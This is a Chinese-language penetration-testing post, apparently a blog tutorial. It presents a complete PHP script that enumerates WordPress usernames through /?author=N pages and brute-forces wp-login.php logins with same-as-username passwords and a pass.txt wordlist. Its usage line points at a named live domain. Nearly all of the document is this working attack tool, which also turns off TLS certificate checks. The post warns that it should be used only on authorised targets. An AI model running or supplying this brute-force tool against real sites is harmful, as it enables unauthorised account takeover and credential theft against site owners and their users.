在某些情况下,渗透测试者遇到的是最新版本、且没有安装任何插件的 WordPress,常规的漏洞利用无从下手;此时可以退而求其次,采用暴力猜解登录口令的方法。
思路是:先通过 /?author=N 枚举用户名(脚本从响应页面中的作者 feed 链接 /author/&lt;用户名&gt;/feed/ 里取出用户名),然后尝试"用户名与密码相同"的帐户;对没有命中的帐户,再用脚本同目录下的 pass.txt 字典逐个尝试。脚本默认只枚举前 10 个用户 ID,可自行修改。注意:每次尝试都是一次真实的 wp-login.php 登录请求,会留在目标日志中,也可能触发登录锁定,请只在获得授权的目标上使用。
Usage:
php wordpress.php http://www.chncto.com
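<?php

/*
 * WordPress username enumeration + weak-password check.
 *
 * Usage: php wordpress.php http://target [max_author_id]
 *
 * Step 1: request /?author=N for N = 1..max_author_id (default 10) and pull
 *         the user slug out of the author feed link in the response body.
 * Step 2: try each slug as its own password.
 * Step 3: try every line of pass.txt against the users not cracked in step 2.
 *
 * Only run this against systems you are authorised to test: every attempt is
 * a real login request to wp-login.php, will appear in the target's logs and
 * may trigger lockout rules.
 */

set_time_limit(0);

if ($argc < 2) {
    fwrite(STDERR, "Usage: php wordpress.php http://target [max_author_id]\n");
    exit(1);
}

// Normalise the base URL so "http://host/" does not become "http://host//?author=1".
$domain = rtrim($argv[1], '/');

// Highest author id to probe: optional second argument, default 10 as before.
$maxAuthorId = isset($argv[2]) ? max(1, (int) $argv[2]) : 10;

// Read the wordlist before sending any request so a missing file fails fast.
// FILE_IGNORE_NEW_LINES: without it each candidate is sent (and printed) with
// a trailing "\n". WordPress appears to trim the password server-side, so the
// attempts still worked, but the printed "user password" line was wrong.
$passwords = file("pass.txt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($passwords === false) {
    fwrite(STDERR, "cannot read pass.txt\n");
    exit(1);
}

//enumerate username
$namearray = []; // was never initialised: count(null) fails when no user is found
for ($i = 1; $i <= $maxAuthorId; $i++) {
    $url = $domain . "/?author=" . $i;
    $response = httprequest($url, 0);
    // httprequest() returns int 404 for a missing author and false on a
    // transport error; neither is a page we can parse.
    if (!is_string($response)) {
        continue;
    }
    // The author page links its own feed as .../author/<slug>/feed/; the slug
    // is the login name. [^\/]+ instead of .* so that two such links on one
    // line cannot be merged into a single bogus "name".
    $pattern = "/author\/([^\/]+)\/feed/";
    if (preg_match($pattern, $response, $name) !== 1) {
        continue; // page exists but carries no feed link: nothing to record
    }
    $namearray[] = $name[1];
}
$namearray = array_values(array_unique($namearray));

echo "totally got".count($namearray)."users\n";

echo "attempting same username&password:\n";

$crackname = crackpassword($namearray, "same");

echo "attempting weak password:\n";

// Do not spend requests (and lockout budget) on accounts already cracked.
if ($crackname) {
    $namearray = array_values(array_diff($namearray, $crackname));
}

crackpassword($namearray, $passwords);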
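/**
 * Try to log in as each user in $namearray via wp-login.php.
 *
 * Reads the script-level $domain (base URL without trailing slash).
 *
 * @param array        $namearray login names to test
 * @param array|string $passwords the literal string "same" to try each name as
 *                                its own password, otherwise a list of candidates
 * @return array list of names for which a login succeeded; empty when none.
 *               (The original returned "" in that case; both are falsy, so the
 *               caller's `if ($crackname)` is unaffected.)
 *
 * Success is inferred from the ABSENCE of 'div id="login_error"' in the
 * response. Anything that is not a normal wp-login.php failure page — a
 * transport error, a 404, a WAF or lockout page — would therefore look like a
 * hit. Non-string or empty responses are skipped rather than reported; a
 * lockout page served with status 200 can still yield a false positive, so
 * verify any reported credential by hand.
 */
function crackpassword($namearray, $passwords)
{
    global $domain;
    // Was initialised to "" — `$str[] = ...` on a string is a fatal error
    // since PHP 7.1, so the first hit in "same" mode crashed the script.
    $crackname = [];
    $url = $domain . "/wp-login.php";

    foreach ($namearray as $name) {
        // "same" mode is just a one-element wordlist holding the name itself.
        $candidates = ($passwords === "same") ? [$name] : $passwords;

        foreach ($candidates as $pass) {
            $post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
            $body = httprequest($url, $post);
            if (!is_string($body) || $body === '') {
                // 404 or curl failure: no evidence either way, not a hit.
                continue;
            }
            if (strpos($body, 'div id="login_error"') === false) {
                echo "$name $pass"."\n";
                $crackname[] = $name;
                break; // one valid password per account is enough; stop generating attempts
            }
        }
    }

    return $crackname;
}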
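/**
 * Perform one HTTP request with cURL and return the response body.
 *
 * @param string $url  absolute URL
 * @param mixed  $post falsy for GET; otherwise the raw
 *                     application/x-www-form-urlencoded request body
 * @return int|string|false int 404 when the server answered 404; false when
 *                          cURL failed (timeout, DNS, connection refused);
 *                          otherwise the response body as a string
 *
 * Redirects are followed, so the body returned is that of the final hop. No
 * cookie jar is configured, so cookies set on one hop are not sent on the
 * next. TLS certificate verification is deliberately disabled (test targets
 * often use self-signed certificates); this exposes the tool's own traffic to
 * interception, which is tolerable for a brute-force helper but must not be
 * copied into code that carries anything sensitive.
 */
function httprequest($url, $post)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    // Bounded waits: the script runs under set_time_limit(0), so without these
    // a single unresponsive target would stall the whole run indefinitely.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_MAXREDIRS, 10);

    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }

    $output = curl_exec($ch);
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($output === false) {
        // Surface transport errors: callers infer login success from the
        // absence of an error div, so a silent failure is exactly what they
        // must not mistake for a hit.
        fwrite(STDERR, "request to $url failed: " . curl_error($ch) . "\n");
    }
    curl_close($ch);

    if ($httpcode === 404) {
        return 404;
    }
    return $output;
}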
82 ?> 全文完